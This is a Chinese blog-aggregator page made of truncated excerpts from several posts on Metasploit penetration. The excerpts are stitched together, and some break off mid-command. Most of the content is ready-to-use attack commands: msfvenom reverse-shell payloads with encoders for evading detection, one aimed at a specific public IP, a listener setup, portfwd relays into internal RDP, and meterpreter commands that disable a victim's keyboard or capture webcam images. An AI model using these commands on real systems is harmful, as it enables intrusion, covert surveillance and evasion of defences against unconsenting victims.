meterpreter

穿越边界的姿势

匿名 (未验证) 提交于 2019-12-03 00:26:01
前言 上个学期一直在学审计,前几天ST2漏洞大火,随便打一个就是root权限,我却拿着root权限不知如何继续进行。因为这个,发现了自己对渗透知识的缺失,因此用了两周左右的时间学习补充了一下内网渗透的知识,看了不少大牛的文章,膜拜之余还是做了一些笔记的。到渗透入门结束之余,打算自己整理一下最近学习到的关于渗透的知识,写一篇文章。 回过头看渗透,在机械流程的前提下,什么情况下使用什么工具,做出什么反应的适应性思路更为重要。一次大快人心的渗透过程与扎实的基础知识和熟练的工具使用是分不开的。 渗透初探 一个概念 正向shell: 攻击者连接被攻击者机器,可用于攻击者处于内网,被攻击者处于公网的情况。 反向shell: 被攻击者主动连接攻击者,可用于攻击者处于外网,被攻击者处于内网的情况。 msf shell 反向shell 正向shell Linux:msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.1.102 lport=4444 -f elf -o isshell Windows:msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b ‘\x00’ LHOST=121.196.209.139 LPORT=4444 -f

5.4 MS17_010

匿名 (未验证) 提交于 2019-12-03 00:11:01
PoC、Exploit、Payload、Shellcode的区别: 1.PoC是一段针对某一漏洞的测试代码,其目的是测试目标系统是否存在着该漏洞,常用python编写。 2、Exploit是是利用某一漏洞(通常是use exploit/././)进行攻击的动作。 3、Payload:攻击载荷,指使用Exploit成功攻击目标系统之后,真正在目标系统执行的代码或指令,通常是.rb文件,使用Ruby语言编写。payload的目的是在对目标主机攻击成功后给攻击者返回一个控制通道。 4、shellcode:是payload的一种,包括正向的,反向的,甚至meterpreter。 5、meterpreter也是一种payload,使用它作为攻击载荷能够获得目标系统的一个Meterpreter shell的链接。Meterpreter shell作为渗透模块有很多有用的功能,比如添加一个用户、隐藏一些东西、打开shell、得到用户密码、上传下载远程主机的文件、运行cmd.exe、捕捉屏幕、得到远程控制权、捕获按键信息、清除应用程序、显示远程主机的系统信息、显示远程机器的网络接口和IP地址等信息。另外Meterpreter能够躲避入侵检测系统。在远程主机上隐藏自己,它不改变系统硬盘中的文件,因此HIDS[基于主机的入侵检测系统]很难对它做出响应。此外它在运行的时候系统时间是变化的

Msf小结

匿名 (未验证) 提交于 2019-12-02 23:55:01
Msfvenom是有效负载生成和编码的组合。 1 msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<IP Address> LPORT=<your port to connect on> -e -f elf -a x86 --platform linux -o shell 1 msfvenom -p windows/shell_reverse_tcp LHOST=<your IP Address> LPORT=<your port to connect on> -b "\x00\x0a\x0d" -a x86 --platform win -f c 1 msfvenom -p cmd/unix/reverse_python LHOST=<your IP Address> LPORT=<your port to connect on> -o shell.py 1 msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp -a x86 --platform win -o shell.asp 1 msfvenom -p cmd/unix/reverse_bash LHOST=

渗透测试之三内网跳板

时光怂恿深爱的人放手 提交于 2019-12-01 13:51:51
搭建内网的转发跳板 当成功控制一个网络中的一台主机后,由于后面的主机都在内网中无法访问,所以需要在跳板机上搭建代理,实现对内网中的其他主机的访问 portfwd是一款强大的端口转发工具,支持TCP,UDP,支持IPV4–IPV6的转换转发。并且内置于meterpreter。 攻击机: 192.168.1.5 Debian 靶机: 192.168.1.4 Windows 7 192.168.1.119 Windows 2003 靶机IP为:192.168.1.119—windows 2003—x64 需要转发端口为:80,3389 执行命令如下 if defined PSModulePath (echo ok!) else (echo sorry!) 查看使用参数 meterpreter > portfwd ‐h 添加本地33389到目标主机3389的端口转发 meterpreter > portfwd add ‐l 33389 ‐r 192.168.1.119 ‐p 3389 添加本地30080到目标主机80的端口转发 meterpreter> portfwd add ‐l 30080 ‐r 192.168.1.119 ‐p 80 查看端口转发信息 meterpreter > portfwd 这时访问本地主机的33389端口相当于访问目标主机的3389端口

网站提权之MSF骚操作

对着背影说爱祢 提交于 2019-12-01 13:47:36
当我们在进行web渗透测试的时候,拿到了webshell,但是在执行net user、whoami、类似的命令会发现怎么好像用不了,没有回显,权限不够,这可怎么办呐? 测试环境: 内网,没钱买服务器,而且还拿不到站,尴尬的事情😭 攻击者:parrotos 这个系统跟kali差不多 服务器:windows2003 那么,我们现在先来看看 使用msfvenom如何生成payload msfvenom 这个是一个什么东西就不用说了吧,玩过metasploit的都知道(表示我还是一个新手!!!),当然没玩过的自行谷歌,已经很多大佬跟我说过这个是渗透测试最基本的东西 在freebuf上面看到msfvenom命令行选项的中文翻译,我直接搬过来了,不犯法吧,哈哈哈!!! msfvenom命令行选项 Options: 12345678910111213141516171819 -p, --payload <payload> 指定需要使用的payload(攻击载荷)。如果需要使用自定义的payload,请使用'-'或者stdin指定-l, --list [module_type] 列出指定模块的所有可用资源. 模块类型包括: payloads, encoders, nops, all-n, --nopsled <length> 为payload预先指定一个NOP滑动长度-f, --format

后渗透之meterpreter使用攻略

邮差的信 提交于 2019-12-01 13:47:09
Metasploit中的Meterpreter模块在后渗透阶段具有强大的攻击力,本文主要整理了meterpreter的常用命令、脚本及使用方式。包含信息收集、提权、注册表操作、令牌操纵、哈希利用、后门植入等。 0x01.系统命令 1)基本系统命令 sessions #sessions –h 查看帮助 sessions -i <ID值> #进入会话 -k 杀死会话 background #将当前会话放置后台 run #执行已有的模块,输入run后按两下tab,列出已有的脚本 info #查看已有模块信息 getuid # 查看权限 getpid # 获取当前进程的pid sysinfo # 查看目标机系统信息 ps # 查看当前活跃进程 kill <PID值> 杀死进程 idletime #查看目标机闲置时间 reboot / shutdown #重启/关机 shell #进入目标机cmd shell 2)uictl开关键盘/鼠标 uictl [enable/disable] [keyboard/mouse/all] #开启或禁止键盘/鼠标 uictl disable mouse #禁用鼠标 uictl disable keyboard #禁用键盘 3)webcam摄像头命令 webcam_list #查看摄像头 webcam_snap #通过摄像头拍照 webcam_stream

[漏洞复现] CVE-2017-11882 通杀所有office版本-[转载]

喜欢而已 提交于 2019-12-01 07:26:48
原文链接:http://blog.51cto.com/chenxinjie/2092755 1、漏洞概述 这几个月来,针对微软Office套件最火热最流行的***手段,莫过于基于CVE-2017-11882的漏洞利用。 2017年11月14号,微软推送了常规的安全更新,其中,关于CVE-2017-11882的安全更新引起了圈里的关注,随之而来的,便是针对此漏洞的POC***代码被逐渐公开。各路大神在Twitter和Github上相继公布自己的POC及对应的漏洞利用姿势,将这股烈火蔓延到2018年。 为什么这个漏洞会引起这么大的关注度呢? 从漏洞利用效果来看,它可以通杀Office 2003到2016的所有版本,并且整个***环境的构建非常简单,姿势又非常“优雅”。例如,有些***效果会出现弹框,会出现CPU飙高,会发生异常等等,而这个漏洞的利用效果,堪称“无色无味”。在后续实验过程中,大家可以自行体会。 更重要的是,这枚“通杀型”的Office高危漏洞,其实已经潜伏了17年之久,直到近几个月才被发现并低调修复…… 那么,这个漏洞是怎么回事呢?简单来说: 此漏洞是由Office软件里面的 [公式编辑器] 造成的,由于编辑器进程没有对名称长度进行校验,导致缓冲区溢出,***者通过构造特殊的字符,可以实现任意代码执行。 举个例子,如果***利用这个漏洞

meterpreter学习笔记

℡╲_俬逩灬. 提交于 2019-11-30 12:57:48
0x01 系统命令 基本系统命令 1 background # 将当前会话放置后台 2 sessions # sessions –h 查看帮助 3 sessions -i <ID值> #进入会话 -k 杀死会话 4 bgrun / run # 执行已有的模块,输入run后按两下tab,列出已有的脚本 5 info # 查看已有模块信息 6 getuid # 查看当前用户身份 7 getprivs # 查看当前用户具备的权限 8 getpid # 获取当前进程ID(PID) 9 sysinfo # 查看目标机系统信息 10 irb # 开启ruby终端 11 ps # 查看正在运行的进程 12 kill <PID值> # 杀死指定PID进程 13 idletime # 查看目标机闲置时间 14 reboot / shutdown # 重启/关机 15 shell # 进入目标机cmd shell 常用cmd命令 1 whoami # 当前权限 2 quser # 查询当前在线的管理员 3 net user # 查看存在用户 4 net user 用户名 密码 /add # 添加用户和对应密码 5 net localgroup 用户组名 用户名 /add # 将指定用户添加到指定用户组 6 netstat -ano # 查询当前计算机中网络连接通信情况

渗透测试工具

微笑、不失礼 提交于 2019-11-29 20:53:34
最好的 NMAP 扫描策略 # 适用所有大小网络最好的 nmap 扫描策略 # 主机发现,生成存活主机列表 $ nmap -sn -T4 -oG Discovery.gnmap 192.168.56.0/24 $ grep "Status: Up" Discovery.gnmap | cut -f 2 -d ' ' > LiveHosts.txt # 端口发现,发现大部分常用端口 # http://nmap.org/presentations/BHDC08/bhdc08-slides-fyodor.pdf $ nmap -sS -T4 -Pn -oG TopTCP -iL LiveHosts.txt $ nmap -sU -T4 -Pn -oN TopUDP -iL LiveHosts.txt $ nmap -sS -T4 -Pn --top-ports 3674 -oG 3674 -iL LiveHosts.txt # 端口发现,发现全部端口,但 UDP 端口的扫描会非常慢 $ nmap -sS -T4 -Pn -p 0-65535 -oN FullTCP -iL LiveHosts.txt $ nmap -sU -T4 -Pn -p 0-65535 -oN FullUDP -iL LiveHosts.txt # 显示 TCP\UDP 端口 $ grep "open"

msf拿到shell之后的一条龙套餐

ぃ、小莉子 提交于 2019-11-26 09:25:49
生成ps 反弹脚本 msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.123 lport=12345 -f psh-reflection>/tmp/search.ps1 msf 监听反弹 msf > use exploit/multi/handler msf exploit(handler) > set payload windows/x64/meterpreter/reverse_tcp msf exploit(handler) > set LHOST 192.168.43.100 msf exploit(handler) > set LPORT 4444 msf exploit(handler) > set ExitOnSession false msf exploit(handler) > exploit -j -z [*] Exploit running as background job 0. [*] Started reverse TCP handler on 192.168.43.100:4444 以上是 如何 用msfvenom 生成木马,并且 msf 如何监听 木马运行之后 弹的shell。 包括昨天 用的 green-hat-suite_Pass 这个工具 已经凉了啊感觉 ......